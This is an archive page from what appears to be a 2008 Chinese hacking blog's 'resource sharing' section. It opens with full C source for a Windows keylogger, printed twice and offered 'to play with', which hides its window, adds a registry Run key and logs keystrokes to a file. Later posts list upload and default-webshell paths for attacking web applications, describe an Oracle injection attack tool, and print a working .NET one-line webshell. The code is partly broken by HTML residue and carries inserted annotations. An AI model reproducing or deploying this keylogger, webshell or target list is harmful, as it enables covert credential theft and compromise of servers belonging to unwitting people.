
‘资源共享’ 分类的存档

共享一个键盘记录的源码

2008年10月20日 没有评论 126 views

PS:很早的一个源码了,大家拿去玩玩吧

#include <windows.h>
#include <stdio.h>
#include <time.h>


// Keystroke logger sample ("cLog", the name used in its own banner and Run value).
// What the listing does, in order:
//   1. hides a console window              (ATT&CK T1564.003, Hidden Window)
//   2. writes a Run value under HKLM       (ATT&CK T1547.001, Registry Run Keys)
//   3. appends a timestamped banner to c:\log.txt
//   4. polls GetAsyncKeyState in an endless loop and appends every detected
//      key to C:\log.txt                   (ATT&CK T1056.001, Keylogging)
// Host artefacts useful for detection and triage: the Run value "Autostart"
// pointing at C:\Programme\cLog.exe, the file c:\log.txt, and the banner
// strings written below.
// Only the fopen inside the polling loop has its result checked; every other
// Win32 and stdio return value in this listing is ignored.
// NOTE(review): a stray '>' and split "&nbs" / "p;" fragments inside the body
// look like HTML-extraction residue, not program text; they are kept as found.
int main(void)
{
// Hide consolewindows
// FindWindow is called with a class name and a NULL title, so it returns some
// window of class "ConsoleWindowClass" -- presumably this process's own
// console, but the code does not verify that.
   HWND hwnd = FindWindow("ConsoleWindowClass",NULL);
   ShowWindow(hwnd,SW_HIDE);

//Autostart Keylogger on systemstartup
// Persistence indicator: value "Autostart" = "C:\Programme\cLog.exe" under
// HKLM Software\Microsoft\Windows\CurrentVersion\Run.
  HKEY hkey;
  HKEY KEY = HKEY_LOCAL_MACHINE;
  char place[100]= {"Software\\Microsoft\\Windows\\CurrentVersion\\Run"};
  char name[100]= {"Autostart"};
  char value[100]= {"C:\\Programme\\cLog.exe"};

  // The key is opened with KEY_ALL_ACCESS; the result of the open is not
  // checked before hkey is used, so a denied open is not reported anywhere.
  RegOpenKeyEx(KEY,(LPCTSTR)place,0, KEY_ALL_ACCESS,&hkey);
  RegSetValueEx(hkey, name, 0, REG_SZ, (BYTE *)value, strlen(value));
  RegCloseKey(hkey);
//------------------------------------------------------------------------------

// Locals used by the log-size check near the end of the loop body.
// LogLength is never assigned anywhere in this listing.
int idex;
char *buffer;
long LogLength;
long len;


// Session banner: appended to c:\log.txt once per start (fopen result unchecked).
FILE *log;
   log=fopen("c:\\log.txt","a+");
// Check time and Date and write to file
   time_t theTime=time(0);
   fputs("\nLogged keys by cLog at: ", log);
   fputs(ctime(&theTime),log);
// some advertisement
// These fixed strings are stable content signatures for the log file.
   fputs("-------------------------------------------------\n",log);
   fputs("~~~~~~~ by CC_IP POWERED BY EXCLUDED.ORG ~~~~~~\n",log);
   fputs("-------------------------------------------------\n",log);
   fputs("\n",log);
   fclose(log);





// logging keys
// This handle is shadowed by the inner "FILE *log" declarations below and is
// not closed in the visible code.
log=fopen("c:\\log.txt","a+");


           short character;
             // Endless polling loop: the only exit in the listing is the
             // "return 1" taken when the per-key fopen fails.
             while(1)
             {
                    // Scans virtual-key codes 8 through 222 on every pass.
                    for(character=8;character<=222;character++)
                    {
                        // -32767 is 0x8001 as a 16-bit signed value: key-down bit
                        // and pressed-since-last-call bit both set.
                        if(GetAsyncKeyState(character)==-32767)
                        {  
                            // The log is reopened in append mode for each detected
                            // key and closed again in every branch below.
                            FILE *log;
                            log=fopen("C:\\log.txt","a+");
                            if(log==NULL)
                            {
                                    return 1;
                            }            
                            if(log!=NULL)
                            {        
                                    // Codes 39..64 are written as the raw byte; the
                                    // range includes the digit keys 0x30-0x39.
                                    if((character>=39)&&(character<=64))
                                    {
                                          fputc(character,log);
                                          fclose(log);
                                          break;
                                    }        
                                    // Codes 65..90 (letter keys) are shifted by 32 to
                                    // lowercase ASCII; SHIFT/CAPS state is not consulted here.
                                    else if((character>64)&&(character<91))
                                    {
                                          character+=32;
                                          fputc(character,log);
                                          fclose(log);
                                          break;
                                    }
                                    else
>                                    {
                                        // Remaining keys: codes 187-190 and the numpad
                                        // digits become one character each, named keys
                                        // become bracketed markers on their own line.
                                        // "break" here leaves the switch only, so the
                                        // for-scan continues with the next key code.
                                        switch(character)
                                        {
                                              case 187:
                                              fputc('+',log);
                                              fclose(log);
                                              break;
                                              case 188:
                                              fputc(',',log);
                                              fclose(log);
                                              break;
                                              case 189:
                                              fputc('-',log);
                                              fclose(log);
                                              break;
                                              case 190:
                                              fputc('.',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD0:
                                              fputc('0',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD1:
                                              fputc('1',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD2:
                   &nbs
p;                          fputc('2',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD3:
                                              fputc('3',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD4:
                                              fputc('4',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD5:
                                              fputc('5',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD6:
                                              fputc('6',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD7:
                                              fputc('7',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD8:
                                              fputc('8',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD9:
          &nb
sp;                                   fputc('9',log);
                                              fclose(log);
                                              break;
                                              case VK_CAPITAL:
                                              fputs("\r\n[CAPS LOCK]\r\n",log);
                                              fclose(log);
                                              break;
                                              // No break follows this case in the listing:
                                              // control continues into VK_SPACE.
                                              case VK_SHIFT:
                                              fputs("\r\n[SHIFT]\r\n",log);
                                              fclose(log);
                                              case VK_SPACE:
                                              fputc(' ',log);
                                              fclose(log);
                                              break;    
                                              case VK_CONTROL:
                                              fputs("\r\n[CTRL]\r\n",log);
                                              fclose(log);
                                              break;
                                              break;                                            
                                              case VK_RETURN:
                                              fputs("\r\n[RETURN]\r\n",log);
                                              fclose(log);
                                              break;
                                              case VK_BACK:
                                              fputs("\r\n[BACKSPACE]\r\n",log);
                                              fclose(log);
                                      &
nbsp;       break;
                                              case VK_TAB:
                                              fputs("\r\n[TAB]\r\n",log);
                                              fclose(log);
                                              break;
                                              case VK_DELETE:
                                              fputs("\r\n[DELETE]\r\n",log);
                                              fclose(log);
                                              break;
                                              // Any other key code: nothing is written.
                                              default:
                                              fclose(log);
                                              break;
                                       }        
                                  }    
                             }        
                   }    
               }                  
           // Still inside while(1): runs after every scan pass. The log size is
           // compared with LogLength, which holds an indeterminate value, so
           // whether the branch runs cannot be told from the source. When it
           // does, the file content is read into a heap buffer and the file is
           // reopened with "w", which truncates it; the buffer is not used
           // again in the visible code. Forensic note: c:\log.txt may
           // therefore be emptied at unpredictable times.
           FILE *log;
           log=fopen("c:\\log.txt","rb");
           fseek(log,0,SEEK_END); //search EOF
           len=ftell(log); //goto end
           if(len>=LogLength) {
             fseek(log,0,SEEK_SET);
             buffer=(char *)malloc(len);
             idex=fread(buffer,1,len,log);//
             buffer[idex] = '\0'; //terminate
             fclose(log);
             log=fopen("c:\\log.txt","w");
             }
           
            fclose(log);
}
            // Placed after the while(1) loop, which contains no break.
            free (buffer);
}

// Developed by CC_IP powered by www.excluded.org
#include <windows.h>
#include <stdio.h>
#include <time.h>


// Second printing of the "cLog" keystroke-logger listing on this page.
// Behaviour visible in the code:
//   - hides a window of class "ConsoleWindowClass" (ATT&CK T1564.003)
//   - sets the Run value "Autostart" = C:\Programme\cLog.exe under HKLM
//     Software\Microsoft\Windows\CurrentVersion\Run (ATT&CK T1547.001)
//   - appends a timestamped banner, then every key detected through
//     GetAsyncKeyState polling, to c:\log.txt (ATT&CK T1056.001)
// Detection hooks: the Run value, the log file path, the banner strings, and
// a process that calls GetAsyncKeyState for codes 8..222 in a loop with no
// sleep or wait call between passes.
// Return values are ignored everywhere except the fopen inside the loop.
// NOTE(review): the "&nbs" / "p;" fragments and the lines broken in the middle
// of the indentation look like HTML-extraction residue; they are kept as found.
int main(void)
{
// Hide consolewindows
// The window is found by class name only (title is NULL); that it is this
// process's own console is an assumption the code does not check.
   HWND hwnd = FindWindow("ConsoleWindowClass",NULL);
   ShowWindow(hwnd,SW_HIDE);

//Autostart Keylogger on systemstartup
// Registry persistence: key path, value name and data are the three fixed
// strings declared here.
  HKEY hkey;
  HKEY KEY = HKEY_LOCAL_MACHINE;
  char place[100]= {"Software\\Microsoft\\Windows\\CurrentVersion\\Run"};
  char name[100]= {"Autostart"};
  char value[100]= {"C:\\Programme\\cLog.exe"};

  // Opened with KEY_ALL_ACCESS; hkey is used without checking that the open
  // succeeded.
  RegOpenKeyEx(KEY,(LPCTSTR)place,0, KEY_ALL_ACCESS,&hkey);
  RegSetValueEx(hkey, name, 0, REG_SZ, (BYTE *)value, strlen(value));
  RegCloseKey(hkey);
//------------------------------------------------------------------------------

// State for the log-size check at the end of the loop body; LogLength is
// declared here and never assigned in the listing.
int idex;
char *buffer;
long LogLength;
long len;


// Start-of-session banner appended to c:\log.txt (fopen result unchecked).
FILE *log;
   log=fopen("c:\\log.txt","a+");
// Check time and Date and write to file
   time_t theTime=time(0);
   fputs("\nLogged keys by cLog at: ", log);
   fputs(ctime(&theTime),log);
// some advertisement
// Fixed strings; usable as content signatures when hunting for the log file.
   fputs("-------------------------------------------------\n",log);
   fputs("~~~~~~~ by CC_IP POWERED BY EXCLUDED.ORG ~~~~~~\n",log);
   fputs("-------------------------------------------------\n",log);
   fputs("\n",log);
   fclose(log);





// logging keys
// Handle opened here is hidden by the inner "FILE *log" declarations and is
// never closed in the visible code.
log=fopen("c:\\log.txt","a+");


           short character;
             // Loop without a break; it ends only through "return 1" below.
             while(1)
 &nbs
p;           {
                    // One pass over virtual-key codes 8..222.
                    for(character=8;character<=222;character++)
                    {
                        // Matches the 16-bit value 0x8001: key currently down and
                        // pressed since the previous call.
                        if(GetAsyncKeyState(character)==-32767)
                        {  
                            // Per-key open/append/close of the log file.
                            FILE *log;
                            log=fopen("C:\\log.txt","a+");
                            if(log==NULL)
                            {
                                    return 1;
                            }            
                            if(log!=NULL)
                            {        
                                    // 39..64: byte written unchanged (digit keys
                                    // 0x30-0x39 fall in this range).
                                    if((character>=39)&&(character<=64))
                                    {
                                          fputc(character,log);
                                          fclose(log);
                                          break;
                                    }        
                                    // 65..90: letter keys, stored as lowercase ASCII
                                    // regardless of SHIFT or CAPS LOCK state.
                                    else if((character>64)&&(character<91))
                                    {
                                          character+=32;
                                          fputc(character,log);
                                          fclose(log);
                                          break;
                                    }
                                    else
                                    {
                                        // Punctuation codes 187-190, numpad digits and
                                        // named keys; named keys are logged as bracketed
                                        // markers. "break" leaves only the switch.
                                        switch(character)
                                        {
                                              case 187:
                                              fputc('+',log);
                                              fclose(log);
                                              break;
                                              case 188:
        
                                      fputc(',',log);
                                              fclose(log);
                                              break;
                                              case 189:
                                              fputc('-',log);
                                              fclose(log);
                                              break;
                                              case 190:
                                              fputc('.',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD0:
                                              fputc('0',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD1:
                                              fputc('1',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD2:
                                              fputc('2',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD3:
                                              fputc('3',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD4:
 &
nbsp;                                            fputc('4',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD5:
                                              fputc('5',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD6:
                                              fputc('6',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD7:
                                              fputc('7',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD8:
                                              fputc('8',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD9:
                                              fputc('9',log);
                                              fclose(log);
                                              break;
                                              case VK_CAPITAL:
                                              fputs("\r\n[CAPS LOCK]\r\n",log);
                                              fclose(log);
                                              break;
                                              // The VK_SHIFT case below has no break in the
                                              // listing and continues into VK_SPACE.
                                      &nb
sp;       case VK_SHIFT:
                                              fputs("\r\n[SHIFT]\r\n",log);
                                              fclose(log);
                                              case VK_SPACE:
                                              fputc(' ',log);
                                              fclose(log);
                                              break;    
                                              case VK_CONTROL:
                                              fputs("\r\n[CTRL]\r\n",log);
                                              fclose(log);
                                              break;
                                              break;                                            
                                              case VK_RETURN:
                                              fputs("\r\n[RETURN]\r\n",log);
                                              fclose(log);
                                              break;
                                              case VK_BACK:
                                              fputs("\r\n[BACKSPACE]\r\n",log);
                                              fclose(log);
                                              break;
                                              case VK_TAB:
                                              fputs("\r\n[TAB]\r\n",log);
                                              fclose(log);
                                              break;
                                              case VK_DELETE:
                                              fputs("\r\n[DELETE]\r\n",log);
                                              fclose(log);
                
                              break;
                                              // Unlisted key codes are dropped without output.
                                              default:
                                              fclose(log);
                                              break;
                                       }        
                                  }    
                             }        
                   }    
               }                  
           // Executed after each scan pass, still inside while(1). The file
           // size is compared with the unassigned LogLength; when the branch
           // is taken the content is copied to a heap buffer and the file is
           // reopened in "w" mode, which empties it. Nothing in the visible
           // code uses the buffer afterwards, so evidence in c:\log.txt can
           // disappear between two observations.
           FILE *log;
           log=fopen("c:\\log.txt","rb");
           fseek(log,0,SEEK_END); //search EOF
           len=ftell(log); //goto end
           if(len>=LogLength) {
             fseek(log,0,SEEK_SET);
             buffer=(char *)malloc(len);
             idex=fread(buffer,1,len,log);//
             buffer[idex] = '\0'; //terminate
             fclose(log);
             log=fopen("c:\\log.txt","w");
             }
           
            fclose(log);
}
            // Sits after the endless loop above, which has no break.
            free (buffer);
}

// Developed by CC_IP powered by www.excluded.org

分类: 资源共享 标签:

公布一批上传页查询关键

2008年10月20日 没有评论 113 views

/eWebEditor/upload.asp #eWebEditor上传页面
/editor/upload.asp #eWebEditor上传页面
/bbs/upfile.asp #动网论坛上传页面
/forum/upfile.asp #动网论坛上传页面
/dvbbs/upfile.asp #动网论坛上传页面
/upfile_soft.asp #动力管理系统上传页面
/upload.asp?action=upfile #乔客6.0上传页面
/upfile.asp #动网论坛上传页面
/bbs/down_addsoft.asp #动网论坛插件上传页面
/bbs/down_picupfile.asp #动网论坛插件上传页面
/down_picupload.asp #动网论坛插件上传页面
/admin/admin_upfile.asp #管理员后台上传页面
/admin/upfile.asp #管理员后台上传页面
/admin/upload.asp #管理员后台上传页面
/admin/uploadfaceok.asp #尘缘上传页面
/news/admin/upfile.asp #新闻管理上传页面
/admin_upfile.asp #飞龙文章管理系统

/user_upfile.asp #飞龙文章管理系统
/upload_flash.asp #秋叶购物商城上传页面
/Saveannounce_upload.asp #购物中心上传页面
/UploadFace.asp #沸腾展望新闻系统

/bbs/diy.asp #Domian3.0默认木马
/UploadSoft/diy.asp #Domian3.0 默认木马
/diy.asp #Domian3.0默认木马
/upload/upload.asp #某某文章管理系统
/mybbs/saveup.asp #MYBBS论坛上传页面
/dxxobbs/upload.asp #DxxoBBS论坛上传页面
/img_upfile.asp #任我飞扬驿站上传页面
/Upfile_SoftPic.asp #动力管理系统上传页面
/upfile_flash.asp #秋叶购物商城上传页面

 

分类: 资源共享 标签:

Linx Oracle 自动攻击器

2008年10月19日 没有评论 129 views

来源:linx2008
* 利用条件:
1.oracle服务器可以读取当前php脚本
*2.要运行系统命令,请先在oracle服务器创建 sys.LinxRunCMD() 函数

提示:
要获得cookie,请运行
 

javascript:document.cookie=window.prompt("Edit cookie:",document.cookie);void(0);

* 注射方式:为必填内容,注射语句用"(<**>)"代替。
使用步骤:

eg:如果你的注射地址是 http://host/test.jsp?action=read&id=123,则
1.输入"注射地址",
2.点击"数值型" or "字符型",此时自动生成 注射方式:
 

http://host/test.jsp?action=read&id=123 and chr(1) not in (<**>)

3.如果你没有创建函数,请先点击“创建函数”
4.选择操作:运行命令 or读取文件
5.输入命令,选择"生成语句",再点击 运行语句
 

下载地址:点击下载

分类: 资源共享 标签:

BackTrack 3 正式版 迅雷高速下载

2008年10月18日 没有评论 1,008 views

Description: CD Image
Name: bt3-final.iso
Size: 695 MB
MD5: f79cbfbcd25147df32f5f6dfa287c2d9
SHA1: 471f0e41931366517ea8bffe910fb09a815e42c7
Download: Click here

Description: USB Version (Extended)
Name: bt3final_usb.iso
Size: 784 MB
MD5: 5d27c768e9c2fef61bbc208c78dadf22
SHA1: 3aceedea0e8e70fff2e7f7a7f3039704014e980f
Download: Click here

Description: VMware Image
Name: BACKTRACK3_VMWare.rar
Size: 689 MB
MD5: 94212d3c24cf439644f158d90094ed6a
SHA1: 21c9a3f9658133efff259adbe290723583b4fd82
Download: Click here

分类: 资源共享 标签:

OWASP WebGoat + WebScarab

2008年10月18日 没有评论 276 views

一、OWASP WebScarab Project
a tool for performing all types of security testing on web applications and web services

下载地址:OWASP Source Code Center at Sourceforge

安装方法:
Linux: java -jar ./webscarab-selfcontained-[numbers].jar
Windows: double-click the installer jar file

A Mac OS X package of the latest version can usually be found on Corsaire's download page.

You can also try the Java Web Start version, which was signed by Rogan Dawes.

演示&教程下载地址:
1. http://sourceforge.net/project/showfiles.php?group_id=233075&package_id=286265
2. http://yehg.net/lab/pr0js/training/webscarab.php

截图:

详情:http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project

二、OWASP WebGoat Project
an online training environment for hands-on learning about application security
鬼仔注:也是WebScarab的那些演示中用的那套系统。

下载地址:Google code downloads

安装方法:
* Double-click on webgoat.bat - a Tomcat command window starts
* Browse to http://localhost/WebGoat/attack

用户手册:WebGoat User and Install Guide

演示&教程下载地址:http://yehg.net/lab/pr0js/training/webgoat.php

截图:

详情:http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project

分类: 资源共享 标签:

BackTrack 3 (BT3)中文版,可显示中文文件及文件夹(二)

2008年10月17日 没有评论 4,816 views

来源:Chinadu`s Blog

要实现bt3的完全中文化,只要在原版bt3的基础上加上huatux的包,再加上一个local包:

这样启动bt3后(我的是bt3 beta3版,final版应该一样,未测)就可以看到中文文件夹及文件了,效果图如下:

 

 

 

分类: 资源共享 标签:

Backtrack 3(BT3)中文版,可显示中文文件及文件夹(一)

2008年10月17日 没有评论 1,047 views

来源:Chinadu`s Blog

网上可以找到两个bt3的中文包,一个20m左右(分四个文件),一个60m左右(一个文件),但两个包都不能实现完整的中文化,都不能显示中文文件夹,对FAT32磁盘里的中文是显示“?????”,NTFS磁盘里的中文索性不显示。
    经过一个晚上的研究,终于可以使bt3正常显示中文文件夹及文件了。
    bt3是基于slax的linux系统,在国内有个fanx的是做slax汉化的,最新版是FanX2,我所要做的就是把FanX2里的中文包移植到bt3里面(我所做的是基于bt3 beta 3,在bt3 final里应该也可以用,大家可以试试),把以下这个lzm文件放到“BT3\modules”下就OK了。

不过这个包由于是移植自FanX2的,所以界面也是FanX2的,不过功能全部是bt3的,下面是界面示意图:

 

用这个包的好处是这是从最新的slax中文版里提取的,视频解码等都非常齐备,可以直接播放rmvb,至于其他功能,大家就自己去发现发现吧。
至于有网友说无法启动之类的,应该是由于加载了过多的lzm包,或错误的lzm包等引起的,大家自己研究一下吧。

下载文件:点击下载

分类: 资源共享 标签:

SCRT Mini MySqlat0r-Java写的mysql注入检测工具

2008年10月15日 没有评论 118 views

Introduction
Mini MySqlat0r is a multi-platform application used to audit web sites in order to discover and exploit SQL injection vulnerabilities. It is written in Java and is used through a user-friendly GUI that contains three distinct modules.

The Crawler module allows the user to view the web site structure and gather all tamperable parameters. These parameters are then sent to the Tester module that tests all parameters for SQL injection vulnerabilities. If any are found, they are then sent to the Exploiter module that can exploit the injections to gather data from the database.
http://www.scrt.ch/imagesite/sqlator.jpg
Mini MySqlat0r can be used on any platform running the Java environment and is distributed under GPL licence.
Prerequisites
The Java runtime environment is necessary to use Mini MySqlat0r :
- Java JRE
Downloads
version 0.3
Program      mms_0_3.jar
Source code      mms_src.jar
Documentation      mms_manual.pdf

详情查看:http://www.scrt.ch/pages_en/minimysqlator.html

分类: 资源共享 标签:

新的远程OS指纹被动判别工具-p0f

2008年10月15日 没有评论 45 views

来源:3w417

p0f 是继Nmap和Xprobe2之后又一款远程操作系统判别工具;与主动发包探测的Nmap、Xprobe2不同,p0f采用被动方式,只分析已观察到的流量。它支持:

1. 反连SYN 模式
2. 正连SYN+ACK 模式
3. 空连RST+ 模式
4. 碎片ACK模式

p0f比较有特色的是它还可以探测:

1. 是否运行于防火墙之后
2. 是否运行于NAT模式
3. 是否运行于负载均衡模式
4. 远程系统已启动时间
5. 远程系统的DSL和ISP信息等

输出类似的报表:

192.165.38.73:20908 - OpenBSD 3.0-3.4 (up: 836 hrs)
-> 217.8.32.51:80 (distance 6, link: GPRS or FreeS/WAN)
192.165.38.73:21154 - Linux 2.4/2.6 (NAT!) (up: 173 hrs)
-> 217.8.32.51:80 (distance 6, link: GPRS or FreeS/WAN)
192.165.38.73:22003 - Windows XP Pro SP1, 2000 SP3 (NAT!)
-> 217.8.32.51:80 (distance 6, link: GPRS or FreeS/WAN)

下载地址:http://lcamtuf.coredump.cx/p0f/

分类: 资源共享 标签:

开机svchost进程CPU 占用率过高问题

2008年10月15日 没有评论 95 views

最近总是发现开机后有一个svchost进程占用CPU非常高,大概有30秒左右系统都很慢,疑神疑鬼的以为是中了木马,查了很久都没有问题。

今天终于解决了!装这个补丁:http://go.microsoft.com/fwlink/?LinkID=91237

装了之后重启感觉好多了,错觉? :)

PS:
这个补丁叫:windowsupdateagent30-x86.exe
补丁详细介绍看这里:http://msdn.microsoft.com/en-us/library/aa387285.aspx

分类: 资源共享 标签:

SCRT Webshag web服务器审计工具(Python)

2008年10月15日 没有评论 74 views

SCRT Webshag
Introduction
Webshag is a multi-threaded, multi-platform web server audit tool. Written in Python, it gathers commonly useful functionalities for web server auditing like website crawling, URL scanning or file fuzzing.

 

Webshag can be used to scan a web server in HTTP or HTTPS, through a proxy and using HTTP authentication (Basic and Digest). In addition to that it proposes innovative IDS evasion functionalities aimed at making correlation between request more complicated (e.g. use a different random per request HTTP proxy server).

It also provides innovative functionalities like the capability of retrieving the list of domain names hosted on a target machine and file fuzzing using dynamically generated filenames (in addition to common list-based fuzzing).

Webshag URL scanner and file fuzzer are aimed at reducing the number of false positives and thus producing cleaner result sets. For this purpose, webshag implements a web page fingerprinting mechanism resistant to content changes. This fingerprinting mechanism is then used in a false positive removal algorithm specially aimed at dealing with "soft 404" server responses. Webshag provides a full featured and intuitive graphical user interface as well as a text-based command line interface and is available for Linux and Windows platforms, under GPL license.

Requirements
To be fully functional, webshag requires the following elements:

- Python 2.5 or ActivePython 2.5
- wxPython GUI toolkit
- Nmap port scanner (for port scanning module only)
- A valid Live Search AppID (for domain information module only)

Note that Windows installer does not require Python or wxPython.
Downloads
version 1.00
Linux (tarball)

ws100_linux.tar.gz
Windows (installer)

ws100_win.exe
Source only (no database)

ws100_src.tar.gz
User Manual (EN)

ws100_manual.pdf
Feedback
Please report bugs and comments to
http://www.scrt.ch/imagesite/mail_webshag.jpg

Credits
Webshag is distributed with Nikto vulnerability database.
Windows installer built using py2exe and Inno Setup.

分类: 资源共享 标签:

新型 .net 一句话及客户端

2008年10月14日 没有评论 78 views

作者:cnqing

软件说明:
程序包 包括一个基于反射的.net 一句话木马。

<%-- Reflection-based one-line web shell, annotated for defenders.
     What the line does: parses the "psw" cookie as an integer, reads that many
     bytes from the request with Request.BinaryRead, loads them as a .NET
     assembly with Assembly.Load, and instantiates the type named "c" from it,
     passing the current page object as the constructor argument. The empty
     catch block discards every exception, so a failed request leaves no error
     output on the page.
     Review and hunting pointers: Assembly.Load fed directly from
     Request.BinaryRead inside page markup, an integer-valued cookie named
     "psw", and request bodies that are raw PE/.NET assemblies. --%>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["psw"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>

客户端 当前插件
文件管理
.net探针
CMDshell
端口转发

截图:




下载地址:
http://www.cncert.net/up_files/soft/aspxclient.rar

分类: 资源共享 标签: